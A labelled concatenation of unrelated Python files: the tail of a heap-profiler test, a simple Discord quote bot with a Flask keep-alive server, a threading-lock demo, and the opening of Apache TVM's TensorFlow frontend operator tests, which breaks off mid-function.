for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
if thread_id == _nogevent.main_thread_id:
thread_found = True
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "test_heap"
):
break
else:
pytest.fail("No trace of allocation in heap")
assert thread_found, "Main thread not found"
y = _pre_allocate_1k()
for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "_pre_allocate_1k"
):
break
else:
pytest.fail("No trace of allocation in heap")
del x
gc.collect()
for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "test_heap"
):
pytest.fail("Allocated memory still in heap")
del y
gc.collect()
for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "_pre_allocate_1k"
):
pytest.fail("Allocated memory still in heap")
_memalloc.stop()
def test_heap_collector():
heap_sample_size = 4 * 1024
r = recorder.Recorder()
mc = memalloc.MemoryCollector(r, heap_sample_size=heap_sample_size)
with mc:
keep_me = _allocate_1k()
events = mc.snapshot()
assert len(events) == 1
assert len(events[0]) >= 1
del keep_me
for event in events[0]:
assert 0 < len(event.frames) <= mc.max_nframe
assert event.nframes >= len(event.frames)
assert event.sample_size == heap_sample_size
assert len(event.frames) >= 1
assert event.size > 0
assert event.thread_id > 0
assert isinstance(event.thread_name, str)
def test_heap_stress():
# This should run for a few seconds, and is enough to spot potential segfaults.
_memalloc.start(64, 64, 1024)
x = []
for _ in range(20):
for _ in range(1000):
x.append(object())
_memalloc.heap()
del x[:100]
_memalloc.stop()
@pytest.mark.parametrize("heap_sample_size", (0, 512 * 1024, 1024 * 1024, 2048 * 1024, 4096 * 1024))
def test_memalloc_speed(benchmark, heap_sample_size):
if heap_sample_size:
r = recorder.Recorder()
with memalloc.MemoryCollector(r, heap_sample_size=heap_sample_size):
benchmark(_allocate_1k)
else:
benchmark(_allocate_1k)
|
main.py
|
import discord
from itertools import cycle
from discord.ext import tasks, commands
from datetime import date
from flask import Flask
from threading import Thread
app = Flask('')
today = date.today()
# Quote Library
quote_library = {}
@app.route('/')
def main():
return "Your Bot Is Ready"
def run():
app.run(host="0.0.0.0", port=8000)
def keep_alive():
server = Thread(target=run)
server.start()
client = commands.Bot(command_prefix='.')
status = cycle(['Status 1', 'Status 2', 'Status 3'])
@client.event
async def on_ready():
change_status.start()
print("Quote Bot is Ready!")
@tasks.loop(seconds=10)
async def change_status():
await client.change_presence(activity=discord.Game(next(status)))
# List of Quotable People
def getlist(dictionary):
return list(dictionary.keys())
# Ping Command to check bot latency
@client.command(aliases=["PING", "Ping", "p", "P"])
async def ping(ctx):
await ctx.send(f"Ping: {round(client.latency * 1000)}ms")
# Help Command to get list of Commands
@client.command(aliases=["Guide", "GUIDE", "G", "g"])
async def guide(ctx):
await ctx.send(f"Here are all the available commands:\n"
f".ping - Checks the latency of the Quote Bot\n"
f".guide - Provides a list of all commands\n"
f".add name - Adds a new quotable person\n"
f".delete name - Deletes a quotable person\n"
f".q message ~ name - Adds a quote to the person's list of quotes\n"
f".d name - Displays all of the person's quotes\n"
f".r index ~ name - Removes a specific quote from a person's list\n"
f".a name - Displays the total number of quotes a person has\n"
f".c name - Clears all quotes from the person's list")
# Add Command to Add a New Quotable Person
@client.command(aliases=["Add", "ADD"])
async def add(ctx, *, name):
if quote_library.get(name) is None:
temp = {name: list()}
quote_library.update(temp)
await ctx.send(f"{name} has been added as a quotable person!")
else:
await ctx.send("The person you are trying to add already exists")
# Del Command to Delete a Quotable Person
@client.command(aliases=["Delete", "DELETE"])
async def delete(ctx, *, name):
if quote_library.get(name) is None:
await ctx.send("The person you are trying to remove doesn't exist")
else:
del quote_library[name]
await ctx.send(f"{name} has been removed from the list of quotable people")
# Quote Command to add a Quote to a Quotable Person
@client.command(aliases=["Quote", "QUOTE", "q", "Q"])
async def quote(ctx, *, message):
messagelist = [x.strip() for x in message.split('~')]
if quote_library.get(messagelist[-1]) is None:
await ctx.send("The person you are trying to quote is not yet a quotable person")
else:
quote_library.get(messagelist[-1]).append(f"{today} - {messagelist[0]}")
await ctx.send("Quoted!")
# Display Command to displau all quotes of a particular person
@client.command(aliases=["Display", "DISPLAY", "d", "D"])
async def display(ctx, *, name):
if quote_library.get(name) is None:
await ctx.send("The person you have searched for is not a quotable person\n"
"Please check the spelling of the name and ensure it matches with one of the following:\n"
+ (str(getlist(quote_library))) +
f"\nOtherwise, please add this person to the list of quotable people using .add")
elif len(quote_library.get(name)) == 0:
await ctx.send(f"{name} does not have any quotes yet! You can change that by using "
f".quote")
else:
for elem in quote_library.get(name):
await ctx.send(f"{(1 + (quote_library.get(name).index(elem)))}. {elem}")
# Amount Command that displays the number of times a person has been quoted
@client.command(aliases=["Amount", "AMOUNT", "a", "A"])
async def amount(ctx, *, name):
if quote_library.get(name) is None:
await ctx.send("The person you have searched for is not a quotable person\n"
"Please check the spelling of the name and ensure it matches with one of the following:\n"
+ (str(getlist(quote_library))) +
f"\nOtherwise, please add this person to the list of quotable people using .add")
else:
await ctx.send(f"{name} has been quoted {len(quote_library.get(name))} times")
# Remove Command that removes a specific quote using the number assigned to the quote
@client.command(aliases=["Remove", "REMOVE", "r", "R"])
async def remove(ctx, *, info):
infolist = [x.strip() for x in info.split('~')]
if quote_library.get(infolist[-1]) is None:
await ctx.send("The person you have searched for is not a quotable person\n"
"Please check the spelling of the name and ensure it matches with one of the following:\n"
+ (str(getlist(quote_library))) +
f"\nOtherwise, please add this person to the list of quotable people using .add")
else:
del quote_library.get(infolist[-1])[(int(infolist[0])-1)]
await ctx.send("The quote has been removed")
# Clear Command that removes all quotes from a person's list
@client.command(aliases=["Clear", "CLEAR", "c", "C"])
async def clear(ctx, *, name):
quote_library.get(name).clear()
await ctx.send(f"{name}'s quotes have been cleared")
client.run('token')
|
same_class_with_lock.py
|
#!/usr/bin/env python
# coding: utf-8
import threading
import time
class Controller(threading.Thread):
def __init__(self,p1):
self.p1 = p1
self.lock = threading.Lock()
def run(self):
print('run')
t1 = threading.Thread(target=self.new_thread)
t1.start()
# First process
while True:
time.sleep(1)
with self.lock:
self.p1 = 'toto'
time.sleep(0.1)
print(self.unified_function('controller'))
def new_thread(self):
# Second process
while True:
time.sleep(1)
with self.lock:
self.p1 = 'tata'
time.sleep(0.5)
print(self.unified_function('new_thread'))
def unified_function(self, user):
return 'data from : '+self.p1+' and '+user
if __name__ == "__main__":
p1 = 'toto'
cont = Controller(p1)
cont.run()
|
test_forward.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.numpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].numpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
):
"""Generic function to compile on relay and execute on tvm"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def, layout=layout, shape=shape_dict, outputs=out_names
)
dev = tvm.device(target, 0)
if mode == "debug":
ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = ex.evaluate()(*inputs)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
print(mod["main"])
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).numpy() for i in range(num_output)]
return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
"""Generic function to execute tensorflow"""
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
)
# since the names from tensorflow and relay runs are not exactly same,
# first len(tf_output) will be compared
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
"""One iteration of pool operation with given shapes and attributes"""
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
"""Pooling with dynamic height and width dimensions."""
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
"""Pooling"""
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
